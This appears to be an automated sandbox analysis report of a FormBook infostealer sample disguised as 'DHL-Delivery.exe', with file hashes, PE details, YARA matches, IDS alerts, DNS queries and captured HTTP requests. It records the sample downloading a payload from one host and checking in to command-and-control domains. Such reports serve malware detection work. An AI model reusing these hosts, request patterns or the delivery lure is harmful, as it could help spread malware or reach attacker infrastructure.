                      SHA1:7E11E248AE804D3647479A4FE5F03835A1EEE4BC
                      SHA-256:0F312587A999305794730DA6F2198C82A346E64211E2FB054256102AC70315BE
                      SHA-512:538CC0C1B4DC66E8A3C6CA9A17DDAC128441874248589BCC6C88B64AD7D3B93FF143867D6FAD0002CBB4584E951D0E82441C350396E6D59B73207A3FFE0FC055
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}_odbcad32_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):5.954813670123038
                      Encrypted:false
                      SSDEEP:768:fzheYQ/OnxvOSp4eCYapPYJ5OUVmdCZh3qZACZc7:fvQ/Onxvzp4eCvwOQ7
                      MD5:6F0D8710C462B5955D9D16745BDB1BFD
                      SHA1:ED0545934A28799EF27DDDCC0439D05DC40C47AC
                      SHA-256:342F29784A85F25EC119D85E39267EC57A4C803FBC099F6C5CEB7761F8896CFD
                      SHA-512:404085314A3CF37E8E66AECD314D63EA9711D05C1ECB714D531126E61B7BB9929E59E4A42CB736DDADE1AC416D76477881D18B428BFD603FEDE3E9EEB7B6F8CB
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{F38BF404-1D43-42F2-9305-67DE0B28FC23}_regedit_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):2.7485129788496976
                      Encrypted:false
                      SSDEEP:96:Xea3yOWkJHbYfzJyRl5DJwLG4stxQSNySMg24SqXVjg6rxwj097:1pxT5yJstxlyH1Ag6r
                      MD5:F7D39503EE83519A810CFE794E287514
                      SHA1:8A7580A57E3470B208038E44755718422154F5AA
                      SHA-256:360905ADC4E1D0F05F9E461056B18AAAA986702A6E22305E9E5DA4B9048ECB01
                      SHA-512:53ABA75813912F04A9F067A984D16B6DBA8D5B3D5CA719829017B36372B56E634DFC883747E537E2B8B4C2D53AFDEC974CCD7196536AF250311464D6642A5406
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{661d4762-d61e-4006-9105-81d52048087d}\0.0.filtertrie.intermediate.txt
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:UTF-8 Unicode text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):18741
                      Entropy (8bit):4.5321861324934565
                      Encrypted:false
                      SSDEEP:384:q5m7vHOB17A8YapChANVg3dGajuMAH3g5:IaS17AjANVgw9H3+
                      MD5:643CA44B0B53A574B69F5817980E57D8
                      SHA1:0BA65ADFBEF9F724530736808EECD8036D56908A
                      SHA-256:95DAC8017CCDB48DEB8219CDEC0CACA0D75C8E18E140C0EBB9A4A0B035EFE4E5
                      SHA-512:378F3D3FBE3BBE0C671D7807F5E8327D438176623C7C694D3AB287D9EFF7A2CD16A7030B44EAAD59B752A069C1F58F343A4E4CC48986F205E2601E77C4358042
                      Malicious:false
                      Preview: 0.0.....~.......~....~....~.....~.....~......~.....~.....~.......~.......~......~.....~......~.....~......~......~.......~..zune~..your phone~..y computer~..xontrol~..xnip~..xmd~..xcmd~..xbox video~..xbox music~..xbox game bar~..xbox console companion~..xalc~..x86)~..x64)~..wp~..worpad~..world pad~..workpad~..worf~..word~..wordpd~..wordpas~..wordpad~..word[~..word'~..word processor~..word processing~..word pad~..wodpad~..wmv~..wmplayer~..with advanced security~..winword~..windowsmedia~..windows voice recorder~..windows version~..windows speech recognition~..windows shell~..windows setting~..windows security~..windows scan~..windows powershell~..windows powershell ise~..windows powershell ise (x86)~..windows powershell (x86)~..windows power shell~..windows player~..windows photo~..windows paint~..windows mi~..windows memory diagnostic~..windows media player~..windows medai~..windows mea~..windows md~..windows maps~..win
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{661d4762-d61e-4006-9105-81d52048087d}\0.1.filtertrie.intermediate.txt
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5
                      Entropy (8bit):2.321928094887362
                      Encrypted:false
                      SSDEEP:3:Dy:W
                      MD5:34BD1DFB9F72CF4F86E6DF6DA0A9E49A
                      SHA1:5F96D66F33C81C0B10DF2128D3860E3CB7E89563
                      SHA-256:8E1E6A3D56796A245D0C7B0849548932FEE803BBDB03F6E289495830E017F14C
                      SHA-512:E3787DE7C4BC70CA62234D9A4CDC6BD665BFFA66DEBE3851EE3E8E49E7498B9F1CBC01294BF5E9F75DE13FB78D05879E82FA4B89EE45623FE5BF7AC7E48EDA96
                      Malicious:false
                      Preview: 0.1..
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{661d4762-d61e-4006-9105-81d52048087d}\0.2.filtertrie.intermediate.txt
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5
                      Entropy (8bit):2.321928094887362
                      Encrypted:false
                      SSDEEP:3:Ay:Ay
                      MD5:C204E9FAAF8565AD333828BEFF2D786E
                      SHA1:7D23864F5E2A12C1A5F93B555D2D3E7C8F78EEC1
                      SHA-256:D65B6A3BF11A27A1CED1F7E98082246E40CF01289FD47FE4A5ED46C221F2F73F
                      SHA-512:E72F4F79A4AE2E5E40A41B322BC0408A6DEC282F90E01E0A8AAEDF9FB9D6F04A60F45A844595727539C1643328E9C1B989B90785271CC30A6550BBDA6B1909F8
                      Malicious:false
                      Preview: 0.2..
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{661d4762-d61e-4006-9105-81d52048087d}\Apps.ft
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):25194
                      Entropy (8bit):3.6998068186858943
                      Encrypted:false
                      SSDEEP:768:O8At5YdO2R8l+TWLDxaibfyBfEK2k4RmA2yd:O8At5YdO2R8l+TGDxaibfyBfBGRmA2yd
                      MD5:7E2D3A342715254046D48222D743AF9A
                      SHA1:3784285FB14F57C2E07DCC6B7A538068DE405C62
                      SHA-256:3B518ED0C6CA216DD846849607B7C2D17FAC73E5707CB8A8080AC38F8EFB92D7
                      SHA-512:E5DA0D2C34B5F71DFA79AD6C579A7D7D46E84CE419BF502A092671C0AC41145C9116656AC6CE7E707439A3656420E0E36A73657C22E8B34B9925C073823B5B53
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{661d4762-d61e-4006-9105-81d52048087d}\Apps.index
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):136345
                      Entropy (8bit):4.133420633582902
                      Encrypted:false
                      SSDEEP:1536:brdY3K95j0F/keRjndDnlUyxE+FFK9NPx:bruGj4HCMyR
                      MD5:9D1E2EC561F104392DA3E061D639D7D7
                      SHA1:81B31C09DF5082C9D092FC7CC72E9F19658AD74E
                      SHA-256:5B9174D1BF38E33BDBBDB198A3A235AE927CB1049F7DAC87D7BFACAF8EDD9CAE
                      SHA-512:BF96439CCCE12BC73631436C5902F19F5995EC51F15EDD3E90F3775FAC2D36B0E855F27E155283BDE36F29D77A06098121AA0C30C327BA65452233303BEBC53C
                      Malicious:false
                      Preview: Ej..D..WindowsSearch....Apps...name..gscore..lscore...market.spelling..Qh...K........~<~i.PF.Ae.A<.Au.Aa.Ab.Ac.Ad.Af.Ag.Ah.Ai.Aj.Ak.Al.Am.An.Ao.Ap.Aq.Ar.As.At.Av.Aw.Ax.Ay.Az.b;<....=<.?<B@<.B[<..\<.(<.^<._<.`<. <B!<.B"<.B#<.B]<..$<.%<.&<B'<..)<.+<B,<..-<B.<../<B0<.B1<.B2<.B3<.B4<..:<B5<.B6<.B7<.B8<.B9<..{<.}<.~<A<..a<ae.b<be.c<ce.d<de.f<fe.g<ge.h<he.i<ie.j<je.k<ke.l<le.m<me.n<ne.o<oe.p<pe.q<qe.r<re.s<se.t<te.u<ue.v<ve.w<we.x<xe.y<ye.z<ze..a.b.c.d.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v.w.x.y.z.a.w.c.d.e.f.h.g.i.j.k.l.m.n.o.p.q.r.s.t.u.b.v.x.y.z! ..A!zA".A#..$.%A'..(.).+A,..-A.../.:A;..=.?A@.A[.A]..^._.`.&.\.{.}.~....................A<..a<au.b<bu.c<cu.d<du.e<eu.f<fu.g<gu.h<hu.i<iu.j<ju.k<ku.l<lu.m<mu.n<nu.o<ou.p<pu.q<qu.r<ru.s<su.t<tu.v<vu.w<wu.x<xu.y<yu.z<zu..a.b.c.d.e.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.v.w.x.y.zA<..b<ba.c<ca.d<da.e<ea.f<fa.g<ga.h<ha.i<ia.j<ja.k<ka.l<la.m<ma.n<na.o<oa.p<pa.q<qa.r<ra.s<sa.t<ta.u<ua.v<va.w<wa.x<xa.y<ya.z<za..b.c.d.e.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v.w.x.y.zA<..a<a
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132543128314520433.txt.~tmp
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):109946
                      Entropy (8bit):5.18491162245141
                      Encrypted:false
                      SSDEEP:384:aU/gT2/Hb/jI/Zk/EB/r0E/fX/NV/Cz1/To/Yd/eW/r0g/io/LJ/wIj/va2lO/3P:ocizouSSu/9NSrij5kgE+Y
                      MD5:7BD1ED0B3E7C4D2BF8EDE95216C6D42D
                      SHA1:A99796B8E843F914A4962C9C78B39CAFD99D02BB
                      SHA-256:DDBA552761B286BC9FA56FDFEAABE399B05B220088CF8BC9D60E0E780557CDB9
                      SHA-512:DB1CEC56AB50B4D4CCF937B4C50490463773475CAF55A1A7768BBE7C985187DE636024140E802F9AD6E6777FD5CC9B4AAB4B9E5A3F11533AAEC1569F829CF053
                      Malicious:false
                      Preview: [{"System.FileExtension":{"Value":".com/","Type":12},"System.Software.ProductVersion":{"Value":"N/A","Type":12},"System.Kind":{"Value":"unknown","Type":12},"System.ParsingName":{"Value":"https://java.com/","Type":12},"System.Software.TimesUsed":{"Value":0,"Type":5},"System.Tile.Background":{"Value":16777215,"Type":5},"System.AppUserModel.PackageFullName":{"Value":"N/A","Type":12},"System.Identity":{"Value":"N/A","Type":12},"System.FileName":{"Value":"java","Type":12},"System.ConnectedSearch.JumpList":{"Value":"[]","Type":12},"System.ConnectedSearch.VoiceCommandExamples":{"Value":"[]","Type":12},"System.ItemType":{"Value":"Desktop","Type":12},"System.DateAccessed":{"Value":0,"Type":14},"System.Tile.EncodedTargetPath":{"Value":"https://java.com/","Type":12},"System.Tile.SmallLogoPath":{"Value":"N/A","Type":12},"System.ItemNameDisplay":{"Value":"Visit Java.com","Type":12}},{"System.FileExtension":{"Value":".com/help","Type":12},"System.Software.ProductVersion":{"Value":"N/A","Type":12},"S

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):5.610322387858801
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.15%
                      • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:DHL-Delivery.exe
                      File size:81920
                      MD5:12ba338de35e611aef4461c94713a0ff
                      SHA1:63257aadcfe91fb0556d60cb6af265851e9991d5
                      SHA256:f5e9a63f2238667200b4f015774742db6c4cd71cd109877249f53403da2c1da0
                      SHA512:6d9d68f203a74f97ff90e3a5b3513dff1cb486a85c2adb30995bdc4e175488e8a963ee8571815149fa4a118dd2c58207eae4f92a2fc24d26a07f578622e31e21
                      SSDEEP:768:8KdOAgSZRdBb/q+yVn/QCHO5jj8ZXzeL3KX8r+Oa3:ZzZHd/w/bO5jkXCLaXlOa
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...<!..v...E%..r...Richs...........................PE..L.....HR..................... ......P........ ....@

                      File Icon

                      Icon Hash:20047c7c70f0e004

                      Static PE Info

                      General

                      Entrypoint:0x401350
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      DLL Characteristics:
                      Time Stamp:0x5248D0F8 [Mon Sep 30 01:16:40 2013 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:1aca61efaa2b91c0a5aa52ef07ed6795

                      Entrypoint Preview

                      Instruction
                      push 0040E0B0h
                      call 00007FBA20E01CE5h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      xor byte ptr [eax], al
                      add byte ptr [eax], al
                      cmp byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      inc esp
                      mov dh, D2h
                      jmp far 9DBFh : 4F0955AAh
                      cmc
                      pop edi
                      jmp far 0000h : 00965332h
                      add byte ptr [eax], al
                      add byte ptr [ecx], al
                      add byte ptr [eax], al
                      add byte ptr [ecx+00h], al
                      xchg byte ptr [eax-7Eh], dl
                      add dword ptr [eax+79h], ecx
                      jo 00007FBA20E01D61h
                      arpl word ptr [edx+33h], si
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add bh, bh
                      int3
                      xor dword ptr [eax], eax
                      or esi, ecx
                      leave
                      mov dword ptr [2CC2E758h], eax
                      dec ecx
                      lodsb
                      xor eax, 837AE492h
                      adc dword ptr [ebx-63h], edx
                      cmp dword ptr [edi+eax], edx
                      retf A2FEh
                      inc edi
                      nop
                      lds eax, fword ptr [ebp+13D53D59h]
                      and eax, 33AD4F3Ah
                      cdq
                      iretw
                      adc dword ptr [edi+00AA000Ch], esi
                      pushad
                      rcl dword ptr [ebx+00000000h], cl
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      xchg bl, cl
                      add byte ptr [eax], al
                      inc edx
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      push es
                      add byte ptr [ecx+6Eh], ch
                      jo 00007FBA20E01D65h
                      add byte ptr [43000701h], cl
                      push 666B6375h
                      xor dword ptr [eax], eax
                      sbb dword ptr [ecx], eax
                      add byte ptr [edx+00h], al
                      and al, byte ptr [ecx]
                      and al, 07h

                      Data Directories

                      Name                                  Virtual Address  Virtual Size  Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT          0x11204          0x28          .text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE        0x13000          0xa00         .rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x238            0x20
                      IMAGE_DIRECTORY_ENTRY_IAT             0x1000           0x104         .text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                      Sections

                      Name   Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
                      .text  0x1000           0x106a0       0x11000   False     0.444134880515   data       6.06104625011  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      .data  0x12000          0xba0         0x1000    False     0.00634765625    data       0.0            IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                      .rsrc  0x13000          0xa00         0x1000    False     0.189697265625   data       2.23086788863  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                      Resources

                      Name           RVA      Size   Type                  Language  Country
                      RT_ICON        0x138d0  0x130  data
                      RT_ICON        0x135e8  0x2e8  data
                      RT_ICON        0x134c0  0x128  GLS_BINARY_LSB_FIRST
                      RT_GROUP_ICON  0x13490  0x30   data
                      RT_VERSION     0x13150  0x340  data                  English   United States

                      Imports

                      DLL           Import
                      MSVBVM60.DLL  _CIcos, _adj_fptan, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaExitProc, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaVarTstEq, __vbaI2I4, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, __vbaDerefAry1, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaVarDup, _CIatan, __vbaAryCopy, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                      Version Infos

                      Description       Data
                      Translation       0x0409 0x04b0
                      LegalCopyright    Tubux Electronics Co., Ltd.
                      InternalName      PINGVINER
                      FileVersion       2.00
                      CompanyName       Tubux Electronics Co., Ltd.
                      LegalTrademarks   Tubux Electronics Co., Ltd.
                      ProductName       Hypocr3
                      ProductVersion    2.00
                      FileDescription   Tubux Tools
                      OriginalFilename  PINGVINER.exe

                      Possible Origin

                      Language of compilation system  Country where language is spoken
                      English                         United States

                      Network Behavior

                      Snort IDS Alerts

                      Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP       Dest IP
                      01/05/21-10:34:34.826331  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49717        80         192.168.0.80    34.102.136.180
                      01/05/21-10:34:34.826331  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49717        80         192.168.0.80    34.102.136.180
                      01/05/21-10:34:34.826331  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49717        80         192.168.0.80    34.102.136.180
                      01/05/21-10:34:34.932907  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49717      34.102.136.180  192.168.0.80

                      TCP Packets


                      UDP Packets


                      DNS Queries

                      | Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
                      | --- | --- | --- | --- | --- | --- | --- | --- |
                      | Jan 5, 2021 10:32:38.844948053 CET | 192.168.0.80 | 1.1.1.1 | 0x16bd | Standard query (0) | procesotg.com | A (IP address) | IN (0x0001) |
                      | Jan 5, 2021 10:32:39.861112118 CET | 192.168.0.80 | 9.9.9.9 | 0x16bd | Standard query (0) | procesotg.com | A (IP address) | IN (0x0001) |
                      | Jan 5, 2021 10:34:16.602983952 CET | 192.168.0.80 | 1.1.1.1 | 0x43a | Standard query (0) | www.amonez.com | A (IP address) | IN (0x0001) |
                      | Jan 5, 2021 10:34:34.793181896 CET | 192.168.0.80 | 1.1.1.1 | 0xcfca | Standard query (0) | www.evolutionhvac.net | A (IP address) | IN (0x0001) |
                      | Jan 5, 2021 10:34:55.833118916 CET | 192.168.0.80 | 1.1.1.1 | 0x19a7 | Standard query (0) | www.officialilluminati.net | A (IP address) | IN (0x0001) |
                      | Jan 5, 2021 10:35:14.469818115 CET | 192.168.0.80 | 1.1.1.1 | 0xd08b | Standard query (0) | www.yuneimit.com | A (IP address) | IN (0x0001) |

                      DNS Answers

                      | Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
                      | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
                      | Jan 5, 2021 10:32:40.331700087 CET | 1.1.1.1 | 192.168.0.80 | 0x16bd | No error (0) | procesotg.com | | 162.144.5.131 | A (IP address) | IN (0x0001) |
                      | Jan 5, 2021 10:34:16.645442963 CET | 1.1.1.1 | 192.168.0.80 | 0x43a | Name error (3) | www.amonez.com | none | none | A (IP address) | IN (0x0001) |
                      | Jan 5, 2021 10:34:34.814595938 CET | 1.1.1.1 | 192.168.0.80 | 0xcfca | No error (0) | www.evolutionhvac.net | evolutionhvac.net | | CNAME (Canonical name) | IN (0x0001) |
                      | Jan 5, 2021 10:34:34.814595938 CET | 1.1.1.1 | 192.168.0.80 | 0xcfca | No error (0) | evolutionhvac.net | | 34.102.136.180 | A (IP address) | IN (0x0001) |
                      | Jan 5, 2021 10:34:55.876507044 CET | 1.1.1.1 | 192.168.0.80 | 0x19a7 | No error (0) | www.officialilluminati.net | officialilluminati.net | | CNAME (Canonical name) | IN (0x0001) |
                      | Jan 5, 2021 10:34:55.876507044 CET | 1.1.1.1 | 192.168.0.80 | 0x19a7 | No error (0) | officialilluminati.net | | 198.54.126.238 | A (IP address) | IN (0x0001) |
                      | Jan 5, 2021 10:35:14.969455957 CET | 1.1.1.1 | 192.168.0.80 | 0xd08b | Name error (3) | www.yuneimit.com | none | none | A (IP address) | IN (0x0001) |

                      HTTP Request Dependency Graph

                      • procesotg.com
                      • www.evolutionhvac.net
                      • www.officialilluminati.net

                      HTTP Packets

                      | Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
                      | --- | --- | --- | --- | --- | --- |
                      | 0 | 192.168.0.80 | 49713 | 162.144.5.131 | 80 | C:\Users\user\Desktop\DHL-Delivery.exe |

                      Timestamp | kBytes transferred | Direction | Data
                      Jan 5, 2021 10:32:40.520057917 CET | 69 | OUT | GET /bin_dIyfkt31.bin HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: procesotg.com
                      Cache-Control: no-cache
                      Jan 5, 2021 10:32:40.709104061 CET | 70 | IN | HTTP/1.1 200 OK
                      Date: Tue, 05 Jan 2021 09:32:40 GMT
                      Server: Apache
                      Upgrade: h2,h2c
                      Connection: Upgrade
                      Last-Modified: Mon, 04 Jan 2021 06:39:20 GMT
                      Accept-Ranges: bytes
                      Content-Length: 185920
                      Content-Type: application/octet-stream


                      | Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
                      | --- | --- | --- | --- | --- | --- |
                      | 1 | 192.168.0.80 | 49717 | 34.102.136.180 | 80 | C:\Windows\explorer.exe |

                      Timestamp | kBytes transferred | Direction | Data
                      Jan 5, 2021 10:34:34.826330900 CET | 1435 | OUT | GET /mph/?7nd8=xN8MOsIT0Rq2X8dTTMBNIZU3pxvmACeI7QBEYfYdwwTaJ/23XAd4ioB5cniAuwH0eCwAK57FEw==&H8R=O2M4x0yh946L1Rd0 HTTP/1.1
                      Host: www.evolutionhvac.net
                      Connection: close
                      Data Raw: 00 00 00 00 00 00 00
                      Data Ascii:
                      Jan 5, 2021 10:34:34.932907104 CET | 1435 | IN | HTTP/1.1 403 Forbidden
                      Server: openresty
                      Date: Tue, 05 Jan 2021 09:34:34 GMT
                      Content-Type: text/html
                      Content-Length: 275
                      ETag: "5fd492b4-113"
                      Via: 1.1 google
                      Connection: close
                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                      | Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
                      | --- | --- | --- | --- | --- | --- |
                      | 2 | 192.168.0.80 | 49719 | 198.54.126.238 | 80 | C:\Windows\explorer.exe |

                      Timestamp | kBytes transferred | Direction | Data
                      Jan 5, 2021 10:34:56.174650908 CET | 1455 | OUT | GET /mph/?7nd8=fYI7bmIO81+roZeW9lrXtyBB7ACs35rvTT3MR+zv8ROQxnWL1QNM5JZe5t9Q0E+dD7OYKywqxQ==&H8R=O2M4x0yh946L1Rd0 HTTP/1.1
                      Host: www.officialilluminati.net
                      Connection: close
                      Data Raw: 00 00 00 00 00 00 00
                      Data Ascii:
                      Jan 5, 2021 10:34:56.335369110 CET | 1456 | IN | HTTP/1.1 301 Moved Permanently
                      Date: Tue, 05 Jan 2021 09:34:56 GMT
                      Server: Apache
                      Location: https://www.officialilluminati.net/mph/?7nd8=fYI7bmIO81+roZeW9lrXtyBB7ACs35rvTT3MR+zv8ROQxnWL1QNM5JZe5t9Q0E+dD7OYKywqxQ==&H8R=O2M4x0yh946L1Rd0
                      Content-Length: 354
                      Content-Type: text/html; charset=iso-8859-1
                      Connection: close
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.officialilluminati.net/mph/?7nd8=fYI7bmIO81+roZeW9lrXtyBB7ACs35rvTT3MR+zv8ROQxnWL1QNM5JZe5t9Q0E+dD7OYKywqxQ==&amp;H8R=O2M4x0yh946L1Rd0">here</a>.</p></body></html>


                      Code Manipulations

                      Statistics

                      CPU Usage

                      Memory Usage

                      High Level Behavior Distribution

                      Behavior

                      System Behavior

                      General

                      Start time:10:31:28
                      Start date:05/01/2021
                      Path:C:\Users\user\Desktop\DHL-Delivery.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Users\user\Desktop\DHL-Delivery.exe'
                      Imagebase:0x400000
                      File size:81920 bytes
                      MD5 hash:12BA338DE35E611AEF4461C94713A0FF
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:Visual Basic
                      Reputation:low

                      General

                      Start time:10:32:07
                      Start date:05/01/2021
                      Path:C:\Users\user\Desktop\DHL-Delivery.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Users\user\Desktop\DHL-Delivery.exe'
                      Imagebase:0x400000
                      File size:81920 bytes
                      MD5 hash:12BA338DE35E611AEF4461C94713A0FF
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2192566963.000000001DE60000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2192566963.000000001DE60000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2192566963.000000001DE60000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2176973560.00000000000A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2176973560.00000000000A0000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2176973560.00000000000A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      Reputation:low

                      General

                      Start time:10:32:42
                      Start date:05/01/2021
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:
                      Imagebase:0x7ff7add70000
                      File size:4413936 bytes
